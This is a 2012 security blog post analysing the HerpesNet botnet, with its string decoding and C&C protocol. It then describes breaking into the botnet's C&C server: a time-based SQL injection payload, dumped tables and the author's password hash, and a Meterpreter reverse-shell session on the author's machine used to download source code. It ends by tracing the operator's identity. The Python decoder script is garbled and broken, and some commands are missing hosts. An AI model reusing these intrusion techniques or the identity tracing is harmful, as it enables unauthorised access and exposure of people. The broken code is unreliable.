Analysis & pownage of herpesnet botnet

Published on 2012-05-21 14:00:00.

We received a new sample from our submit mecanism. This sample is a botnet HTTP client called HerpesNet. The md5 of the sample is db6779d497cb5e22697106e26eebfaa8. We started the analysis when we found a way to manage the command & control…


Static analysis

We start by opening the binary with IDA. We see directly that the file is not packed.

We follow the Win_Main function and at offset 004071E0h we can see a call on 004070E0h (initThread)


The initTread function are in charge to decode strings, open a mutex with the name “rffggghooo” and run 3 threads


Decode strings

00406FC0h (initVariable) is in charge to decode all obsfucated string


00403034h (decode) is in charge to decode strings we do a python script to recover all strings


#!/usr/bin/env python
import sys

def decode(src):
    r = ""
    for c in src:
        c = ord(c)
        if  c < 0x61 or c > 0x7a :
            if c < 0x41 or c > 0x5a:
                r += chr(c)
            x = (( c - 0x41 ) % 0x1a) + 0x41
            x = ((c - 0x54) % 0x1a) + 0x61

        r += chr(x)
    return r

def main():
    if len(sys.argv) != 2:

    f = open(sys.argv[1], 'rb'), 0)
    data = 
    for d in data.split("\0"):
        if len(d) == 0:
        print "%s : %s" % (d, decode(d))

if __name__ == "__main__":
    main()$ python db6779d497cb5e22697106e26eebfaa8
tcerfhygy : gpresultl
3.0 : 3.0
uggc://qq.mrebkpbqr.arg/urecarg/ :
74978o6rpp6p19836n17n3p2pq0840o0 : 74978b6ecc6c19836a17a3c2cd0840b0
uggc://jjj.mrebkpbqr.arg/urecarg/ :
sgc.mrebkpbqr.arg :
uggc://sex7.zvar.ah/urecarg/ :
hcybnq@mrebkpbqr.arg :
hccvg : uppit
ujsdsdbbngfgjhhuugfgfujd : hwfqfqooatstwuuhhtstshwq
rffggghooo : esstttubbb
Ashfurncsmx : Afusheapfzk

C&C contact

The function in charge to build the request when it checks the C&C is 004059E0h (buildRerqd)


It build the POST data with the information obtained above to make something like that:


After that it concat the url adding “run.php” add the end of the url passed in parameter


00403E57h are in charge to do the http request. By the way it set the useragent with the value 74978b6ecc6c19836a17a3c2cd0840b0 (is the deofuscated value)


After it mades the request it call 00405F80h (parseCommand) that manages to execute command received from the C&C (I’m not going to detail command here you can look directly in the idb)

Another interesting function is 0040391Fh (fileUpload) thats upload files by POST methods with the variable name “upfile” can be played directly with curl$ curl -F upfile=@test.jpg -A 74978b6ecc6c19836a17a3c2cd0840b0
File caricato correttamente

Pown the C&C

We are curious about how the C&C are coded so we decide to test some injection SQL on the C&C api especially the “”. With sqlmap we manage to exploit a time-based sqli.

Place: POST
Parameter: id
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: userandpc=foo&admin=1&os=WindowsXP&hwid=2&ownerid=12345&version=3.0&raminfo=256&cpuinfo=p1&hdiskinfo=12GO&uptime=3600&mining=0&pinfo=none&vidinfo=none&laninf=none&id=23724' AND SLEEP(5) AND 'PtaQ'='PtaQ
---[08:22:41] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2008 web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.10 back-end DBMS: MySQL 5.0.11

We extract tables names from the database

Database: herpnet
[7 tables]
| clients  |
| clinfo   |
| commands |
| htickets |
| husers   |
| paypalt  |
| uploads  |

And tada we get the user credential of the malware author

|id|username|password                |
| 1|    Frk7|6e6bc4e49dd477ebc98ef4046c067b5f|

With google we get the password


That is a master crime genious password ;)

We found a path disclosure that can be trigger with curl for exemple$ curl
<html><head> <title>404 Not Found</title> </head>
<body> <h1>Not Found</h1>
<p>The requested URL C:\inetpub\zeroxcode\herpnet\run.php/ was not found on this server.</p> <hr> 
<address> Server at Port 80</address> </body></html>

Pown the C&C - part 2

We saw that the developer use a machine called Frk7Test@FRK7TEST-D6E0BD.

So we upload a meterpreter to have a shell on the machine (whith the feature provide by Frk7 himself).

msf  exploit(handler) > exploit

[* ]Started reverse handler on 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 1 opened ( -> at Mon May 21 16:20:04 +0200 2012
meterpreter > screenshot
Screenshot saved to: /home/y0ug/src/msf3/PtPVDrKD.jpeg

meterpreter > sysinfo 
System Language : it_IT
OS              : Windows XP (Build 2600, Service Pack3).
Computer        : FRK7TEST-D6E0BD                                                                                                    
Architecture    : x86                                                                                                                
Meterpreter     : x86/win32                                                                                                          
meterpreter >

meterpreter > ls                                                                                                                     
Listing: C:\Documents and Settings\Frk7Test\Desktop\Herpes4Un                                                                       

Mode              Size    Type  Last modified                   Name
----              ----    ----  -------------                   ----
40777/rwxrwxrwx   0       dir   Mon May 21 15:26:37 +0200 2012  .
40777/rwxrwxrwx   0       dir   Mon May 21 15:37:07 +0200 2012  ..
40777/rwxrwxrwx   0       dir   Mon May 21 14:53:32 +0200 2012  Debug
40777/rwxrwxrwx   0       dir   Mon May 21 16:06:41 +0200 2012  Herpes
100666/rw-rw-rw-  890     fil   Mon May 07 20:42:22 +0200 2012  Herpes.sln
100666/rw-rw-rw-  167424  fil   Mon May 21 16:14:06 +0200 2012  Herpes.suo
40777/rwxrwxrwx   0       dir   Mon May 21 16:15:12 +0200 2012  Release
100777/rwxrwxrwx  134     fil   Mon May 07 20:42:12 +0200 2012  clean.bat
100666/rw-rw-rw-  134     fil   Mon May 07 20:42:22 +0200 2012  roba da fare.txt

meterpreter > download -r Herpes ./
[*] downloading: Herpes\antidebug.h -> .//antidebug.h
[*] downloaded : Herpes\antidebug.h -> .//antidebug.h
[*] mirroring  : Herpes\base64 -> .//base64
[*] downloading: Herpes\base64\base64.c -> .//base64/base64.c
[*] downloaded : Herpes\base64\base64.c -> .//base64/base64.c
[*] downloading: Herpes\base64\base64.h -> .//base64/base64.h
[*] downloaded : Herpes\base64\base64.h -> .//base64/base64.h
[*] mirrored   : Herpes\base64 -> .//base64
[*] mirroring  : Herpes\cadt -> .//cadt
[*] downloading: Herpes\cadt\cadtdll.lib -> .//cadt/cadtdll.lib
[*] downloaded : Herpes\cadt\cadtdll.lib -> .//cadt/cadtdll.lib
[*] downloading: Herpes\cadt\cadtlib.h -> .//cadt/cadtlib.h
[*] downloaded : Herpes\cadt\cadtlib.h -> .//cadt/cadtlib.h

The part of file that we are able to download before frk7 shutdown his machine (and web site) here.

And a screenshot of the machine:


C&C interface

First the login page:


Secondly, the panel page (connected with frk7 account - see on left-top):


The tasks page:


List of command available:


Information about an infected machine (in this case the test machine of frk7 - yes we see you!!)


Botnet owner tracing

We made some research to understand who manage this botnet.

First his pseudo: frk7 or siliceous

Secondly his real name: FP

We identified several mail:

Skype account:

It amazing that a botnet manager puts as much information about his private life !!

It’s so crazy that we wonder if this botnet is not a honeypot of the Italian police !!